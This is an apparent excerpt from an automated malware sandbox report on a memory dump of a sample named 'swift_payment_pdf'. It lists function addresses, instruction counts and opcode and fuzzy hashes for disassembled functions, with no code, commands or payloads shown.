                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 62539f5a339828f1ac8cd608b7c49d76cf98da01a7e207852168a51be1677b54
                  • Instruction ID: 69b9c282ff42029dbaca67f9115e9ed2a91fdd92e255c4292022069be12ec2eb
                  • Opcode Fuzzy Hash: 62539f5a339828f1ac8cd608b7c49d76cf98da01a7e207852168a51be1677b54
                  • Instruction Fuzzy Hash: 8A913579A00216CBEB25DB2DC480BBABBA9EF9471CF15C065EF05AB798F634D805C750
                  Function 0141AB40 Relevance: .2, Instructions: 222COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                  • Instruction ID: 282c975ed9f009c210945aef8bcfaa10f46bc7dffa2dbb3a931361f9f7573c30
                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                  • Instruction Fuzzy Hash: DB81A231A016469FDF19CF99C490AAEBBB2FF84310F24856AD9169B359E734D902CB40
                  Function 0138E284 Relevance: .2, Instructions: 212COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0e0ec00f708ba0070f6a7ab02bd53b346953ab090a111efd224e1d41dde80e47
                  • Instruction ID: 07e7f19c888f2ed2f49ff2c9ee4deee63293c621ae12db605b8e23a0d319cf6b
                  • Opcode Fuzzy Hash: 0e0ec00f708ba0070f6a7ab02bd53b346953ab090a111efd224e1d41dde80e47
                  • Instruction Fuzzy Hash: 0A816C71A00709AFDB25DFA9C880BEEBBB9FF48318F10442DE556A7250DB70AC45CB60
                  Function 0136C640 Relevance: .2, Instructions: 206COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3c8e8aab69504691fe5f5e3217ff8c5da810e233eaa638dae3d5279537a3c9cb
                  • Instruction ID: d5ce164d25d36bbf370ec6960aade8d471156c66c88a9760dbff982219d96448
                  • Opcode Fuzzy Hash: 3c8e8aab69504691fe5f5e3217ff8c5da810e233eaa638dae3d5279537a3c9cb
                  • Instruction Fuzzy Hash: 9C71DF79D01229DFCB258F58C4907FEBBB8FF48718F14815AE982AB754E3749800CB90
                  Function 014047A0 Relevance: .2, Instructions: 202COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a3179c797fd8cd03be95ac3cc880739ddeb5302bc8f9e2e77b8a5db646eaebba
                  • Instruction ID: f68a69c484c5432614df93c51050c35403b1e35f3f2085251266b879822810e1
                  • Opcode Fuzzy Hash: a3179c797fd8cd03be95ac3cc880739ddeb5302bc8f9e2e77b8a5db646eaebba
                  • Instruction Fuzzy Hash: FD7182B4900305EFDB21DF5AD944A9BBBF8EF91710B19416BE714A72B8C7318981CF64
                  Function 0136260B Relevance: .2, Instructions: 201COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 9edf6665ea2e2fba53330880e5b4a42e1d792fc927bb8f8f6a2443d4be515a24
                  • Instruction ID: 151455999cfc3c53e26c8200cb8a30a493a62d6ccc30a6fabf07f4fef6c2e5e7
                  • Opcode Fuzzy Hash: 9edf6665ea2e2fba53330880e5b4a42e1d792fc927bb8f8f6a2443d4be515a24
                  • Instruction Fuzzy Hash: F971DF716046428FD312CF2CC480B6AB7E9FF84318F06C5AAE8998B756DB78DC45CB91
                  Function 013D035C Relevance: .2, Instructions: 198COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                  • Instruction ID: b3ead69f0ba7361098dfb770b7dbe81f6c6299f615b448dc474e37e5eb2c6b0b
                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                  • Instruction Fuzzy Hash: BE717072A0061AEFDB14DFA9D984EDEBBB9FF48704F104569E905E7250DB34EA01CB50
                  Function 013E62A0 Relevance: .2, Instructions: 198COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: a629322c67c14f18c81a01c0c35d2ec1c3985f938060d9dda6efd90aa7ed90c5
                  • Instruction ID: befd6d122f580eee9072e41913245626779baa163720b2b8ae6aba29b2f54347
                  • Opcode Fuzzy Hash: a629322c67c14f18c81a01c0c35d2ec1c3985f938060d9dda6efd90aa7ed90c5
                  • Instruction Fuzzy Hash: 8C7123B2200B11AFEB32DF18C84AF5ABBE6EF50728F114428E2159B6E1D771E844CB50
                  Function 01358AA0 Relevance: .2, Instructions: 197COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b27ebe2db1fc9620763a752d1de924a53977c755625e9a2cdae501f216ec3ad9
                  • Instruction ID: a1bcbd71e02a8e22cfe0cdb2153aee53302f6144c50668650e99f02e599be3b9
                  • Opcode Fuzzy Hash: b27ebe2db1fc9620763a752d1de924a53977c755625e9a2cdae501f216ec3ad9
                  • Instruction Fuzzy Hash: 8481D372A04305CFDB65CF9DC4C4BAE77B5BF48718F194269DA00AB691E734AD40CB90
                  Function 01428324 Relevance: .2, Instructions: 192COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 24ad44bfeb283e2bf6e47a89fe159e6ac8f77cd76ba5735ee65b02f479f704b0
                  • Instruction ID: 7efbabfbfc2e245608cf622de1bd88c45a5cb7933baa85f4602b38ba10354519
                  • Opcode Fuzzy Hash: 24ad44bfeb283e2bf6e47a89fe159e6ac8f77cd76ba5735ee65b02f479f704b0
                  • Instruction Fuzzy Hash: 9C711A71E0061ABFDF15DF98C841FEEBBB8FF04354F50412AE614A62A0D774AA45CB90
                  Function 0140A250 Relevance: .2, Instructions: 184COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 3fa07c1fe8956f44410be06795329f9284a47d9790148f771011dba8da53de21
                  • Instruction ID: 11a78dd625aefb2a82022f06d881917a8d96298e64ca12cdcd4a1ac939b10831
                  • Opcode Fuzzy Hash: 3fa07c1fe8956f44410be06795329f9284a47d9790148f771011dba8da53de21
                  • Instruction Fuzzy Hash: 1551C072504712AFD712DE69C844E5BB7E8EBC4758F02493AFA40DB2A0D774ED05C7A2
                  Function 013F8350 Relevance: .2, Instructions: 161COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 18f5202ab8ba27af40472ce33fa77d894153e0072a0e58788a9963abf165bb08
                  • Instruction ID: 2ae369b0939c319985e7d9480a2d9744843da474534b042ce352b87ac22e7e41
                  • Opcode Fuzzy Hash: 18f5202ab8ba27af40472ce33fa77d894153e0072a0e58788a9963abf165bb08
                  • Instruction Fuzzy Hash: C751E370900709EFDB25DF5AC880AABFBF8FF54718F10465ED296A76A0C770A545CB90
                  Function 0138E443 Relevance: .2, Instructions: 158COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5bc03f8779afa14258efde2e4e53fec8fbf30a1db5cfa4a4e08618025ff1fdf5
                  • Instruction ID: 3f738df85bb31461e865960fcedd2882634ffdc8f7d3a92b7cf67636383e9c57
                  • Opcode Fuzzy Hash: 5bc03f8779afa14258efde2e4e53fec8fbf30a1db5cfa4a4e08618025ff1fdf5
                  • Instruction Fuzzy Hash: 43513871200A09EFCB22EF69C980F6AB3FDFB54758F410469E55697664D734ED40CB60
                  Function 013F4180 Relevance: .2, Instructions: 156COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f93cad8c345fcf5bfe50abd1a739fd3a6a5942d819296cae12bb737b2c87a062
                  • Instruction ID: 5693b55bc563f8fd43e46a2a92026a33ebd286f33f6fdfa0435686eec169f058
                  • Opcode Fuzzy Hash: f93cad8c345fcf5bfe50abd1a739fd3a6a5942d819296cae12bb737b2c87a062
                  • Instruction Fuzzy Hash: 335155716083469FD754DF29D880A6BBBE5FFC8208F44492EF689C7250EB30D915CB92
                  Function 013745B1 Relevance: .2, Instructions: 156COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                  • Instruction ID: 740e478c6248606fa6597fc46150ad5c728d09796e48d3450f4960e091b6a7f9
                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                  • Instruction Fuzzy Hash: 51519471D0025A9BDF25DF98C440BEEFBB9AF45758F044069EA15BB240E738ED44CBA0
                  Function 013DE9E0 Relevance: .2, Instructions: 154COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                  • Instruction ID: 0909f109e48ff258bd05113ab75dc8312eb1d03220dee26e96eccf01c4e3283b
                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                  • Instruction Fuzzy Hash: 1351B873D0461AEFEF119A98D884FAEBF79AF0032CF154675D9126B190D770AE40CBA0
                  Function 01418B28 Relevance: .2, Instructions: 152COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 54477da939df16801dbba2b14523038f7789ed4397aeb9d8b4c01ce670815411
                  • Instruction ID: 5a320bde5e3122f01e5c9cf46c5156053be9baf03cf519498186fb5d13509e99
                  • Opcode Fuzzy Hash: 54477da939df16801dbba2b14523038f7789ed4397aeb9d8b4c01ce670815411
                  • Instruction Fuzzy Hash: E441F8707016039BE729DB2DC894B7BBB9AFF91260F04811BF955873A9E734D801C691
                  Function 013DCBF0 Relevance: .1, Instructions: 148COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 16ea2f84eb4c4af8cb1db1f27d15c578988f76392697f2b16684b8146ede555e
                  • Instruction ID: 6d78a257dd8d05146cd0b4a8ad60d11702d78d2e685dd4f1d7723819dfe5070d
                  • Opcode Fuzzy Hash: 16ea2f84eb4c4af8cb1db1f27d15c578988f76392697f2b16684b8146ede555e
                  • Instruction Fuzzy Hash: FB519FB691021ADFCB20DFADD9809AEBBB9FF48358B225519DA05A3305D730ED01CF90
                  Function 0141A9D3 Relevance: .1, Instructions: 139COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                  • Instruction ID: 0c00b86e6aa55b6fcf2ab1462c2ea5ac97f572b3c89090797a3f11191b189e00
                  • Opcode Fuzzy Hash: 7622aca86cac28a0acf118705f69cf0cc3cb486fddc0e93dd45dfd5b9ea80ff7
                  • Instruction Fuzzy Hash: BC413B326017429FC725CF28C984A6BB7A9FF90254B15862FEA1287758EB30FC04C7C0
                  Function 013801F8 Relevance: .1, Instructions: 138COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 071fddaac9d524a00669a3a3625d4c16d5d96bfa829746268db3fe05be238068
                  • Instruction ID: cd9b6ad401a72e10a802b5bad9010908e552bf8e70ab20232467ac8747fd2aab
                  • Opcode Fuzzy Hash: 071fddaac9d524a00669a3a3625d4c16d5d96bfa829746268db3fe05be238068
                  • Instruction Fuzzy Hash: 6741CB36900319DBDF18EF98C440AEEBBB4BF48708F14826AF815E7240D7709D49CBA4
                  Function 0137EBFC Relevance: .1, Instructions: 138COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 352bd25dc97496bf4edd861adc43aff88d7afe98379d0c104a57eab852ee4824
                  • Instruction ID: 0a44de8378cbdab6528c62ae2ef3bc510e8f7c9f341c0ecbbb1d3f29e2d41a29
                  • Opcode Fuzzy Hash: 352bd25dc97496bf4edd861adc43aff88d7afe98379d0c104a57eab852ee4824
                  • Instruction Fuzzy Hash: 3A41C2752043068FDB21DF2CC880A67B7E9FF8821CF01497EEA56C7A15EB34E8448B50
                  Function 01392750 Relevance: .1, Instructions: 137COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                  • Instruction ID: 5b9d9ad6d44be39962d4ab688720f2554a037dfe7656824a385ef0f876d4b66e
                  • Opcode Fuzzy Hash: f9143dc9ab32c0c56755980999bbdd100a6c23c33ec6549c8632214e05dba9ed
                  • Instruction Fuzzy Hash: B8515A75E00619CFCB15CF98C580AAEF7B6FF84B14F2481A9D915A7351E770AE42CB90
                  Function 01356154 Relevance: .1, Instructions: 133COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4f8dcbdd881d46ff9cd00336b3729b84890b451d2cf1f7cde13a443bfc4a65ac
                  • Instruction ID: 4a2457422cdddf0a1f8c862122bd94ea2df432c538c24263629229982b31a59c
                  • Opcode Fuzzy Hash: 4f8dcbdd881d46ff9cd00336b3729b84890b451d2cf1f7cde13a443bfc4a65ac
                  • Instruction Fuzzy Hash: 7C51F7B090020ADBEB65CB2CCC45FE9BBB5EF1131CF1482A5E919A76D1E7349981CF40
                  Function 01350BCD Relevance: .1, Instructions: 130COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 5b118a24654ce5b9f5680d4373c755cfd5c78c016504c40ce853088bda06eaf8
                  • Instruction ID: 756fd9f3142fcfba1ad3bd575e92b7ec9f889eafcd172a1911b28e9624326967
                  • Opcode Fuzzy Hash: 5b118a24654ce5b9f5680d4373c755cfd5c78c016504c40ce853088bda06eaf8
                  • Instruction Fuzzy Hash: A5418D72A002299FDF61DF6CC940FEE7BB8EF45B48F4140A5E908AB241D7749E81CB91
                  Function 0141866E Relevance: .1, Instructions: 129COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                  • Instruction ID: 20abd25c8aab2af74aad851701f538c700a650c30ea96e87bc5efe9148607a6f
                  • Opcode Fuzzy Hash: 52a1741bb7668dbd0e330b4cee233e7836a49f18a3e4eafb0fad66dd8014cf6e
                  • Instruction Fuzzy Hash: 6341D775B00207ABDB15DF99CC84ABFBBBAAF98240F14406AE918A7369D770DD01C760
                  Function 01350887 Relevance: .1, Instructions: 128COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 2ad0523921551a764a275485b6198085cccf904478412617c5683ea6a04022e4
                  • Instruction ID: 0b6830539b1b039fa30059c6acd569ec418300fa847987c411de6b2eb2a16ab8
                  • Opcode Fuzzy Hash: 2ad0523921551a764a275485b6198085cccf904478412617c5683ea6a04022e4
                  • Instruction Fuzzy Hash: C741E5B16007059FE769CF28C480D26BBF8FF4571CB148A6DE94787A64E732E845CB90
                  Function 0137A470 Relevance: .1, Instructions: 127COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 00c1aa5975c58664581ee1c60444d8dd3f20a4727707e41dd17633952b8164d5
                  • Instruction ID: 9be4ced01536180fb33a56b18004bb7a7ae826ef19f83a3d24bc67952e762e54
                  • Opcode Fuzzy Hash: 00c1aa5975c58664581ee1c60444d8dd3f20a4727707e41dd17633952b8164d5
                  • Instruction Fuzzy Hash: 2841AE32A41209CFDF25DF6CC495BEE7BB4FB18328F180169D511BB6A5DB399940CBA0
                  Function 01358BF0 Relevance: .1, Instructions: 124COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 68f1275fb7d75574f2b8289c82aa4dab0843a7fcd96c8eea1a4b57f9ea0556bf
                  • Instruction ID: a29edd22aafac1e820e327e38a6ecb88007938eb61b0c20c3900cdb6a1184c57
                  • Opcode Fuzzy Hash: 68f1275fb7d75574f2b8289c82aa4dab0843a7fcd96c8eea1a4b57f9ea0556bf
                  • Instruction Fuzzy Hash: 34410435A01206CBDB24DF4DC880F9ABBF5FB94B08F19816ADD019BA65D775D842CB90
                  Function 01348918 Relevance: .1, Instructions: 123COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: b2f824beb35c040f89ee16900e1909d24ff7314988a4966f5034efe3c3eceab3
                  • Instruction ID: 2ae74ce664a3e924146c028f1661ed9003ee6115de6741241381ae6d0ce35739
                  • Opcode Fuzzy Hash: b2f824beb35c040f89ee16900e1909d24ff7314988a4966f5034efe3c3eceab3
                  • Instruction Fuzzy Hash: 2B415C355087469FD312DF69C840A6BFBE9EF84B58F40092AF984D7250E771DE058B93
                  Function 0134A020 Relevance: .1, Instructions: 122COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                  • Instruction ID: b8fe68816043af6b999202a8a49fd88a58e31a0ef99df15c671a698beb61728e
                  • Opcode Fuzzy Hash: 165ca662f4b1c8196e57a2c4173bd848e06efaa623a98917432a96e6c9651090
                  • Instruction Fuzzy Hash: B5418F31A04215DFDB25DF2D84407BAFBF9EB5075CF99C06AEA468B244D633AD84CB90
                  Function 013509AD Relevance: .1, Instructions: 122COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 74bc1815e3343921121183d9a2a5a73b1dea7e0caa68ac9c046434ef27937cc7
                  • Instruction ID: f66e7410f5ce4f12a6b39466fc89f22d1ef3a39b6c5e31355c84a35ca6960434
                  • Opcode Fuzzy Hash: 74bc1815e3343921121183d9a2a5a73b1dea7e0caa68ac9c046434ef27937cc7
                  • Instruction Fuzzy Hash: BE417C71600601EFE765CF18C840B26BBF8FF54B18F65866AF8498B251E771E942CB90
                  Function 01380710 Relevance: .1, Instructions: 121COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                  • Instruction ID: 296e072ba4f0935487db8001cf10dbc28da43e75adc00cfa420c733cbc5cb00d
                  • Opcode Fuzzy Hash: cfe855aa5370e709d3beaf8d0a0824e85895befd2a0058a9eb758e5aacecaf96
                  • Instruction Fuzzy Hash: BB41FA71A00705EFDB28EF98C990AAABBF9FF18704B10496DF556D7651D330AA48CF50
                  Function 0135262C Relevance: .1, Instructions: 119COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: fe9809acde2170caa448e4624728fbf396893abfd5f9cb95a1124122c15520ab
                  • Instruction ID: f3ee55ba43e9ea9d35fe0a6aece7a9612892cb914bbc0aee782959be7f6fbe45
                  • Opcode Fuzzy Hash: fe9809acde2170caa448e4624728fbf396893abfd5f9cb95a1124122c15520ab
                  • Instruction Fuzzy Hash: FA4103B0501705CFDB62EF28C940F6AB7F5FF45B28F15816AC9069B6A2DB309940CF90
                  Function 0138C8F9 Relevance: .1, Instructions: 116COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_1320000_swift_payment_pdf.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: 4e1164c449266a0b0049c9752c31e79087372e7c8a6acedbabf9a08b91fe6db9
                  • Instruction ID: 658663b1ea36b992fb14be14475b61d43e0590fd38a619f630aade9a59cb75a5
                  • Opcode Fuzzy Hash: 4e1164c449266a0b0049c9752c31e79087372e7c8a6acedbabf9a08b91fe6db9
                  • Instruction Fuzzy Hash: 24318AB1A00345DFDB12DF68C440B99BBF4FB49728F2181AED519EB251D3369A42CF90
                  Function 013D07C3 Relevance: .1, Instructions: 114COMMON
                  Download Yara Rule
                  Memory Dump Source
                  • Source File: 00000005.00000002.2253655752.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                  Joe Sandbox IDA Plugin
